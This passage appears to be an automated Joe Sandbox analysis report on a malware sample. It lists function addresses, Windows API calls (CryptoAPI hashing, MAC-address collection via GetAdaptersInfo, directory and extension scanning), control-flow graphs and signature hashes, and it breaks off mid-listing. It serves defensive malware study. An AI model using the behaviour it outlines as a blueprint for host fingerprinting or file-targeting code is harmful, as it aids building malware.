                                                                                                                                                                        • Instruction ID: 6dd41c0cf9d3b8cf1ffb7fbfc81cbe624eee9482d058eb1825666ed336dae431
                                                                                                                                                                        • Opcode Fuzzy Hash: c315dfdbe9038feb8bb9cb5b435323a0c554c2ae0d6a2ba6b98589a2a357c50a
                                                                                                                                                                        • Instruction Fuzzy Hash: 71525D70E00219DFDF10DBA5C898FAEBBF5AF49704F1481A8E505BB251DB70AE45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00BA1010
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1026
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00BA103B
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1051
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00BA1059
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00BA1064
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA107A
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00BA1099
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10AB
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA10CA
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00BA10DE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10F0
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA1100
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA110B
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00BA112E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00BA113C
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00BA1154
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00BA115F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                        • Opcode ID: a1509e6bcd1b032c2131e365d05718a9265c5163f398cabb691adb1cc89ed09f
                                                                                                                                                                        • Instruction ID: 5e55dc9d5364a0eff125a86d7b613ef1136a542d7573d289c6d3afac98b65ac2
                                                                                                                                                                        • Opcode Fuzzy Hash: a1509e6bcd1b032c2131e365d05718a9265c5163f398cabb691adb1cc89ed09f
                                                                                                                                                                        • Instruction Fuzzy Hash: 89516C71D40319ABDF10EBA4DC86FEFBBB8EB04745F100465FA01B6280E7755A058BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1ACA
                                                                                                                                                                          • Part of subcall function 00BA1AB0: DispatchMessageW.USER32(?), ref: 00BA1AE0
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00B9F900
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9F9EA
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00B9FA51
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9FADA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: cd770310439b39e76a1f2b563e5198b58f2e8aa5698a49d06caba21ecd1d4c07
                                                                                                                                                                        • Instruction ID: b8718663ead94f1fe94cde574d1c5c9222d9a343e9e679915682f07c6d0773fb
                                                                                                                                                                        • Opcode Fuzzy Hash: cd770310439b39e76a1f2b563e5198b58f2e8aa5698a49d06caba21ecd1d4c07
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F527D71D00209DBDF20DFA8C885BEEB7F5EF15314F2081B9E419A7251E775AA48CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1885 b9e870-b9e8d6 call ba56d0 CryptAcquireContextW 1888 b9e8e9-b9e901 CryptCreateHash 1885->1888 1889 b9e8d8-b9e8e4 call bc0eca 1885->1889 1891 b9e903-b9e90f call bc0eca 1888->1891 1892 b9e914-b9e930 CryptHashData 1888->1892 1889->1888 1891->1892 1894 b9e943-b9e961 CryptGetHashParam 1892->1894 1895 b9e932-b9e93e call bc0eca 1892->1895 1897 b9e963-b9e96f call bc0eca 1894->1897 1898 b9e974-b9e9a6 call bb0be4 call bbb420 CryptGetHashParam 1894->1898 1895->1894 1897->1898 1904 b9e9b9-b9e9bb 1898->1904 1905 b9e9a8-b9e9b4 call bc0eca 1898->1905 1907 b9e9c0-b9e9c3 1904->1907 1905->1904 1908 b9ea10-b9ea31 call bb2110 CryptDestroyHash CryptReleaseContext 1907->1908 1909 b9e9c5-b9e9df call bb04a6 1907->1909 1914 b9ea3e-b9ea50 1908->1914 1915 b9ea33-b9ea3b call bb2587 1908->1915 1916 b9e9e1-b9e9f0 call ba3ea0 1909->1916 1917 b9e9f2-b9e9f5 1909->1917 1915->1914 1916->1907 1918 b9e9f8-b9e9fd 1917->1918 1918->1918 1921 b9e9ff-b9ea0e call ba3ea0 1918->1921 1921->1907
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000,00000000), ref: 00B9E8CE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E8E4
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9E8F9
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E90F
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00B9E928
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E93E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00B9E95D
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E96F
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9E98E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9E9A2
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E9B4
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E9D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                        • Opcode ID: 89115d823623f8ae5a431446dd9ef84d190e07937e442de5a1cb6a868f33fd93
                                                                                                                                                                        • Instruction ID: e12b4a683aeedfc4ec2e2f72e039dad23af2cc22368a4968f6c5852d6a3d2e11
                                                                                                                                                                        • Opcode Fuzzy Hash: 89115d823623f8ae5a431446dd9ef84d190e07937e442de5a1cb6a868f33fd93
                                                                                                                                                                        • Instruction Fuzzy Hash: 55515D71D40209EBEF11EFA4CC46FFEBBB8EB14705F104569F911B6181D7B5AA058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1926 b9eaa0-b9eb09 call ba56d0 CryptAcquireContextW 1929 b9eb0b-b9eb17 call bc0eca 1926->1929 1930 b9eb1c-b9eb34 CryptCreateHash 1926->1930 1929->1930 1932 b9eb47-b9eb56 CryptHashData 1930->1932 1933 b9eb36-b9eb42 call bc0eca 1930->1933 1935 b9eb69-b9eb87 CryptGetHashParam 1932->1935 1936 b9eb58-b9eb64 call bc0eca 1932->1936 1933->1932 1938 b9eb89-b9eb95 call bc0eca 1935->1938 1939 b9eb9a-b9ebcc call bb0be4 call bbb420 CryptGetHashParam 1935->1939 1936->1935 1938->1939 1945 b9ebdf 1939->1945 1946 b9ebce-b9ebda call bc0eca 1939->1946 1948 b9ebe1-b9ebe4 1945->1948 1946->1945 1949 b9ec38-b9ec67 call bb2110 CryptDestroyHash CryptReleaseContext 1948->1949 1950 b9ebe6-b9ec00 call bb04a6 1948->1950 1955 b9ec13-b9ec19 1950->1955 1956 b9ec02-b9ec11 call ba3ea0 1950->1956 1957 b9ec20-b9ec25 1955->1957 1956->1948 1957->1957 1959 b9ec27-b9ec36 call ba3ea0 1957->1959 1959->1948
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000,00000000,00000000,?), ref: 00B9EB01
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB17
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9EB2C
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB42
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00B9EB4E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB64
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00B9EB83
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB95
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9EBB4
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9EBC8
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EBDA
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9EBF4
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00B9EC44
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00B9EC4F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                        • Opcode ID: 5ba48d07e21e074e133e0982994ffdd0471661fcb796da43063e36c884a77eae
                                                                                                                                                                        • Instruction ID: ac2bf976666d0c891a1f42276aea93649bba61f3f60f1414cc972cf31bb9f377
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ba48d07e21e074e133e0982994ffdd0471661fcb796da43063e36c884a77eae
                                                                                                                                                                        • Instruction Fuzzy Hash: CC515071E40309ABDF11DBA4CC86FEEBBB8EB44745F100469F901B7181E775AA058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1963 b9e670-b9e697 call bb0c62 * 2 1968 b9e699-b9e6b3 call bb1f2d call bb0bed 1963->1968 1969 b9e6b4-b9e6c2 GetAdaptersInfo 1963->1969 1971 b9e6db-b9e6e8 GetAdaptersInfo 1969->1971 1972 b9e6c4-b9e6d9 call bb0bed call bb0c62 1969->1972 1973 b9e6ea-b9e73c call bb04a6 call bb1f2d * 2 1971->1973 1974 b9e744-b9e754 call bb0bed 1971->1974 1972->1968 1972->1971 1989 b9e741 1973->1989 1989->1974
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E67F
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E68B
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E69E
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6A4
                                                                                                                                                                          • Part of subcall function 00BB0BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C13
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6B9
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6C5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E6CD
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6E0
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E720
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E732
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E73C
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E745
                                                                                                                                                                        Strings
                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00B9E71A
                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 00B9E72D
                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00B9E699
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                        • Opcode ID: 76981096679b96be24c5a9fef9f95a7c07a52d6c94cf3de8fa495bb11b382e37
                                                                                                                                                                        • Instruction ID: fe354fcf72fe29bea5f86798f64e6156d9adcafe278811a170164074c585c8a1
                                                                                                                                                                        • Opcode Fuzzy Hash: 76981096679b96be24c5a9fef9f95a7c07a52d6c94cf3de8fa495bb11b382e37
                                                                                                                                                                        • Instruction Fuzzy Hash: D111E7B25146547FC671B2B45C12FFF7ADCCB46712F0405E5FA9CD2141E6989A0493B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2367 b9fb98-b9fb9f 2368 b9fba0-b9fbb9 2367->2368 2368->2368 2369 b9fbbb-b9fbcf 2368->2369 2370 b9fbd1 2369->2370 2371 b9fbd3-b9fc02 PathAppendW call ba8400 2369->2371 2370->2371 2374 b9fc0f-b9fc29 2371->2374 2375 b9fc04-b9fc0c call bb2587 2371->2375 2377 b9fc49-b9fc4c 2374->2377 2378 b9fc2b-b9fc2f 2374->2378 2375->2374 2380 b9fc4f-b9fc6b PathFileExistsW 2377->2380 2378->2380 2381 b9fc31-b9fc47 call bb05a0 2378->2381 2383 b9fc6d-b9fc86 call bb0c62 2380->2383 2384 b9fcdf-b9fce5 2380->2384 2381->2380 2394 b9fc88 2383->2394 2395 b9fc8a-b9fc9f lstrcpyW 2383->2395 2386 b9fcf0-b9fd07 call ba7140 2384->2386 2387 b9fce7-b9fced call bb2587 2384->2387 2396 b9fd09 2386->2396 2397 b9fd0b-b9fd20 FindFirstFileW 2386->2397 2387->2386 2394->2395 2398 b9fca1 2395->2398 2399 b9fca3-b9fcdc lstrcatW call ba4690 call b9f0e0 call bb0bed 2395->2399 2396->2397 2400 b9fd30-b9fd4c 2397->2400 2401 b9fd22-b9fd2d call bb2587 2397->2401 2398->2399 2399->2384 2405 ba0072-ba0076 2400->2405 2406 b9fd52-b9fd55 2400->2406 2401->2400 2407 ba0078-ba0083 call bb2587 2405->2407 2408 ba0086-ba00a4 2405->2408 2411 b9fd60-b9fd6b 2406->2411 2407->2408 2413 ba00b1-ba00c9 2408->2413 2414 ba00a6-ba00ae call bb2587 2408->2414 2416 b9fd70-b9fd76 2411->2416 2420 ba00cb-ba00d3 call bb2587 2413->2420 2421 ba00d6-ba00ee 2413->2421 2414->2413 2422 b9fd78-b9fd7b 2416->2422 2423 b9fd96-b9fd98 2416->2423 2420->2421 2433 ba00fb-ba010b 2421->2433 2434 ba00f0-ba00f8 call bb2587 2421->2434 2427 b9fd7d-b9fd85 2422->2427 2428 b9fd92-b9fd94 2422->2428 2430 b9fd9b-b9fd9d 2423->2430 2427->2423 2432 b9fd87-b9fd90 2427->2432 2428->2430 2435 ba0052-ba0065 FindNextFileW 2430->2435 2436 b9fda3-b9fdae 2430->2436 2432->2416 2432->2428 2434->2433 2435->2411 2439 ba006b-ba006c FindClose 2435->2439 2437 b9fdb0-b9fdb6 2436->2437 2440 b9fdb8-b9fdbb 2437->2440 2441 b9fdd6-b9fdd8 2437->2441 2439->2405 2443 b9fdbd-b9fdc5 2440->2443 2444 b9fdd2-b9fdd4 2440->2444 2445 b9fddb-b9fddd 2441->2445 2443->2441 2446 b9fdc7-b9fdd0 2443->2446 2444->2445 2445->2435 2447 b9fde3-b9fdea 2445->2447 2446->2437 2446->2444 2448 b9fdf0-b9fe71 call ba7140 call ba5ae0 call ba4690 call ba3b70 2447->2448 2449 b9fec2-b9fecc 2447->2449 2471 b9fe81-b9fea9 2448->2471 2472 b9fe73-b9fe7e call bb2587 2448->2472 2451 b9feda-b9fede 2449->2451 2452 b9fece-b9fed5 call ba1ab0 2449->2452 2451->2435 2455 b9fee4-b9ff13 call ba4690 2451->2455 2452->2451 2461 b9ff19-b9ff1f 2455->2461 2462 b9ff15-b9ff17 2455->2462 2464 b9ff22-b9ff2b 2461->2464 2463 b9ff31-b9ff6a call ba5ae0 PathFindExtensionW 2462->2463 2473 b9ff9a-b9ffa8 2463->2473 2474 b9ff6c 2463->2474 2464->2464 2466 b9ff2d-b9ff2f 2464->2466 2466->2463 2471->2435 2478 b9feaf-b9febd call bb2587 2471->2478 2472->2471 2476 b9ffda-b9ffde 2473->2476 2477 b9ffaa 2473->2477 2479 b9ff70-b9ff74 2474->2479 2485 ba003a-ba0042 2476->2485 2486 b9ffe0-b9ffe9 2476->2486 2481 b9ffb0-b9ffb4 2477->2481 2478->2435 2483 b9ff7a 2479->2483 2484 b9ff76-b9ff78 2479->2484 2487 b9ffba 2481->2487 2488 b9ffb6-b9ffb8 2481->2488 2490 b9ff7c-b9ff88 call bb1c02 2483->2490 2484->2490 2491 ba004f 2485->2491 2492 ba0044-ba004c call bb2587 2485->2492 2493 b9ffeb 2486->2493 2494 b9ffed-b9fff9 call bb1c02 2486->2494 2495 b9ffbc-b9ffce call bb1c02 2487->2495 2488->2495 2505 b9ff8a-b9ff8f 2490->2505 2506 b9ff93 2490->2506 2491->2435 2492->2491 2493->2494 2494->2485 2503 b9fffb-ba000b 2494->2503 2495->2485 2510 b9ffd0-b9ffd5 2495->2510 2508 ba000f-ba0026 call bb1c02 2503->2508 2509 ba000d 2503->2509 2505->2479 2511 b9ff91 2505->2511 2507 b9ff97 2506->2507 2507->2473 2508->2485 2515 ba0028-ba0035 call ba11c0 2508->2515 2509->2508 2510->2481 2513 b9ffd7 2510->2513 2511->2507 2513->2476 2515->2485
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
